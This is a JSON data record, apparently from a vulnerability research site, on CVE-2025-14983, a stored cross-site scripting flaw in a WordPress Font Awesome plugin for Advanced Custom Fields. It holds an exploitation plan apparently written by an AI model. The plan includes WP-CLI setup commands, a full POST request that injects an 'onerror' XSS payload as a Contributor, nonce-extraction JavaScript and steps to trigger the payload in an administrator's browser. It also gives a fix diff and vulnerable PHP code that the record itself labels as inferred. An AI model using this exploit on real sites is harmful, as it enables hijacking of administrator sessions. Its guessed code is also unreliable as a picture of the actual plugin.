[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0YQMy647VrbSFY_5qqeBkOpTYV20ZGUEG_t72Cg7WyI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14983","advanced-custom-fields-font-awesome-authenticated-contributor-stored-cross-site-scripting","Advanced Custom Fields: Font Awesome \u003C= 5.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Advanced Custom Fields: Font Awesome Field plugin for WordPress is vulnerable to Cross-Site Scripting in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping. This makes it possible forauthenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts that execute in a victim's browser.","advanced-custom-fields-font-awesome",null,"\u003C=5.0.1","5.0.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-02-19 04:36:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc495d7f6-6d4a-4b1a-90f9-5273e7773d7a?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14983 (Advanced Custom Fields: Font Awesome Field)\n\n## 1. Vulnerability Summary\nThe **Advanced Custom Fields: Font Awesome Field** plugin (versions \u003C= 5.0.1) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape the value of Font Awesome field inputs when they are rendered in the WordPress administrative interface (post editor) or on the frontend. Since a user with Contributor-level permissions can create or edit posts and set ACF field values, they can inject malicious JavaScript into the database, which will then execute in the context of any user (including Administrators) who views the affected post.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fpost.php` (Standard WordPress post update) or `wp-admin\u002Fadmin-ajax.php` (ACF AJAX saves).\n- **Vulnerable Parameter:** The `acf[field_xxxxxxxxxxxx]` parameter, where `xxxxxxxxxxxx` is the unique key of a Font Awesome field.\n- **Authentication Level:** Authenticated, **Contributor+** (Contributor, Author, Editor, or Admin).\n- **Preconditions:** \n    1. The plugin `advanced-custom-fields-font-awesome` must be active.\n    2. An ACF Field Group containing a \"Font Awesome\" field must be created and assigned to a post type that the attacker can edit (e.g., 'Post').\n\n## 3. Code Flow (Inferred)\n1. **Input:** A Contributor edits a post. The request contains the ACF field data: `acf[field_key]=payload`.\n2. **Storage:** ACF processes the field and calls the plugin's `update_value()` method (inherited or overridden). The unsanitized payload is stored in the `wp_postmeta` table.\n3. **Render (Admin):** When an Administrator edits the same post, the plugin's `render_field()` method (within the `acf_field_font_awesome` class) is called to display the current selection. The value is retrieved and echoed into the HTML, likely inside a class attribute or a data attribute, without using `esc_attr()` or `esc_html()`.\n4. **Render (Frontend):** When a user views the post, `the_field()` or `get_field()` calls `format_value()`. If the developer outputs this value directly (e.g., `\u003Ci class=\"\u003C?php the_field('icon'); ?>\">\u003C\u002Fi>`), and the plugin didn't sanitize on save, XSS occurs.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this as a Contributor, we must be able to save post data. WordPress uses the `_wpnonce` for the `editpost` action.\n\n1. **Create an ACF Field Group:** Use WP-CLI to programmatically create a field group and a Font Awesome field attached to \"Posts\".\n2. **Login as Contributor:** Use the `browser_navigate` tool to log in as a user with the `contributor` role.\n3. **Get Nonce & Field Key:**\n   - Navigate to `wp-admin\u002Fpost-new.php`.\n   - Use `browser_eval` to extract:\n     - The `_wpnonce` from the form: `document.querySelector('#_wpnonce').value`.\n     - The ACF field key for the Font Awesome field from the page source: `document.querySelector('.acf-field[data-type=\"font-awesome\"]').getAttribute('data-key')`.\n\n## 5. Exploitation Strategy\n### Step 1: Payload Construction\nWe need to break out of an HTML attribute. Since the value is likely injected into a class or data attribute of an icon tag:\n**Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>` or `\">\u003Cimg src=x onerror=alert(1)>`\n\n### Step 2: Injection (Contributor)\nSubmit a POST request to update a post with the payload.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  _wpnonce=[NONCE]&\n  action=editpost&\n  post_ID=[POST_ID]&\n  post_title=XSS_Test&\n  acf[[FIELD_KEY]]=\">\u003Cimg src=x onerror=alert(document.domain)>\n  ```\n\n### Step 3: Trigger (Admin)\n1. Log in as an Administrator.\n2. Navigate to the \"All Posts\" page or directly to the edit page for the `POST_ID` used in Step 2.\n3. The script will execute when the ACF field preview or the post content is rendered.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `advanced-custom-fields-font-awesome` version 5.0.1 is installed.\n2. **Create User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. **Create ACF Field Group:**\n   ```bash\n   # Create the field group\n   GROUP_ID=$(wp post create --post_type=acf-field-group --post_title=\"Font Group\" --post_status=publish --porcelain)\n   \n   # Create the Font Awesome field within that group\n   wp post create --post_type=acf-field --post_parent=$GROUP_ID --post_title=\"My Icon\" --post_excerpt=\"my_icon_field\" --post_status=publish --post_content='a:10:{s:4:\"type\";s:12:\"font-awesome\";s:12:\"instructions\";s:0:\"\";s:8:\"required\";i:0;s:17:\"conditional_logic\";i:0;s:7:\"wrapper\";a:3:{s:5:\"width\";s:0:\"\";s:5:\"class\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"default_value\";s:0:\"\";s:8:\"save_as\";s:5:\"class\";s:12:\"font_awesome\";s:1:\"4\";s:11:\"enqueue_fa\";i:1;s:12:\"styling_type\";s:7:\"default\";}'\n   \n   # Note: The key is usually field_[unique_id]. We can find it after creation.\n   FIELD_KEY=$(wp post meta list $(wp post list --post_type=acf-field --post_title=\"My Icon\" --format=ids) --filter=field_key --field=meta_value)\n   ```\n4. **Create Target Post:** `POST_ID=$(wp post create --post_type=post --post_title=\"Target Post\" --post_author=$(wp user get attacker --field=ID) --post_status=publish --porcelain)`\n\n## 7. Expected Results\n- When the Administrator edits the `POST_ID`, the HTML rendered by the plugin will look like:\n  `\u003Cdiv ... data-value=\"\">\u003Cimg src=x onerror=alert(document.domain)>\" ...>`\n- An alert box showing the domain will appear in the Admin's browser.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the meta value is stored in its raw form:\n   `wp post meta get [POST_ID] my_icon_field`\n   Should return: `\">\u003Cimg src=x onerror=alert(document.domain)>`\n2. **HTML Response Check:** Use `http_request` to fetch the admin edit page and grep for the payload:\n   `http_request GET http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=edit` (as Admin)\n   Confirm the payload exists unescaped in the response body.\n\n## 9. Alternative Approaches\n- **ACF Settings Injection:** If the field name or labels are also unescaped, XSS can be achieved by an Editor\u002FAdmin modifying the ACF Field Group settings.\n- **Icon Set Bypass:** If the plugin uses a dropdown to select icons, the attacker might intercept the request and replace the selected icon class with the XSS payload.\n- **Frontend Trigger:** If the theme uses `the_field('my_icon_field')` in a template, navigate to the public post URL to trigger the XSS. (Standard ACF usage).","The Advanced Custom Fields: Font Awesome Field plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Font Awesome field value in versions up to 5.0.1. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript by saving a malicious payload in the field, which executes when an administrator or other user views the post in the editor or on the frontend.","\u002F\u002F Inferred from plugin structure: fields\u002Facf-font-awesome-v5.php or similar\n\u002F\u002F Likely within the render_field method of the acf_field_font_awesome class\n\nfunction render_field( $field ) {\n    \u002F\u002F ... (truncated)\n    $value = $field['value'];\n    $name = $field['name'];\n\n    \u002F\u002F Vulnerable rendering of stored value without escaping\n    echo '\u003Cdiv class=\"acf-font-awesome-field-wrapper\" data-value=\"' . $value . '\">';\n    echo '\u003Cinput type=\"hidden\" name=\"' . $name . '\" value=\"' . $value . '\" \u002F>';\n    \u002F\u002F ... (truncated)\n}\n\n---\n\n\u002F\u002F Likely within the format_value method affecting frontend display\n\nfunction format_value( $value, $post_id, $field ) {\n    \u002F\u002F If the plugin returns the raw string for use in templates\n    return $value;\n}","--- a\u002Ffields\u002Facf-font-awesome-v5.php\n+++ b\u002Ffields\u002Facf-font-awesome-v5.php\n@@ -120,7 +120,7 @@\n     $value = $field['value'];\n     $name = $field['name'];\n \n-    echo '\u003Cdiv class=\"acf-font-awesome-field-wrapper\" data-value=\"' . $value . '\">';\n-    echo '\u003Cinput type=\"hidden\" name=\"' . $name . '\" value=\"' . $value . '\" \u002F>';\n+    echo '\u003Cdiv class=\"acf-font-awesome-field-wrapper\" data-value=\"' . esc_attr($value) . '\">';\n+    echo '\u003Cinput type=\"hidden\" name=\"' . esc_attr($name) . '\" value=\"' . esc_attr($value) . '\" \u002F>';\n \n function update_value( $value, $post_id, $field ) {\n-    return $value;\n+    return sanitize_text_field($value);\n }","The exploit is achieved by an authenticated user with at least Contributor permissions who has the ability to edit posts where an ACF Font Awesome field is present. \n\n1. The attacker logs into the WordPress dashboard and navigates to the 'Post' editor for a new or existing post.\n2. The attacker identifies the ACF field key for the Font Awesome field (e.g., `acf[field_63e...]`) by inspecting the page source or using developer tools.\n3. The attacker intercepts the post save request (editpost) or submits a request directly to `wp-admin\u002Fpost.php` containing a payload designed to break out of HTML attributes, such as: `\">\u003Cimg src=x onerror=alert(document.domain)>`.\n4. Because the plugin fails to sanitize this input upon saving and fails to escape it upon rendering, the payload is stored in the `wp_postmeta` table.\n5. When an administrator views the 'All Posts' list or edits the specific post, the malicious script executes within their browser session, potentially allowing for session hijacking or further administrative actions.","gemini-3-flash-preview","2026-04-19 04:42:19","2026-04-19 04:44:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.0.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-custom-fields-font-awesome\u002Ftags\u002F5.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-custom-fields-font-awesome.5.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-custom-fields-font-awesome\u002Ftags\u002F5.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-custom-fields-font-awesome.5.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-custom-fields-font-awesome\u002Ftags"]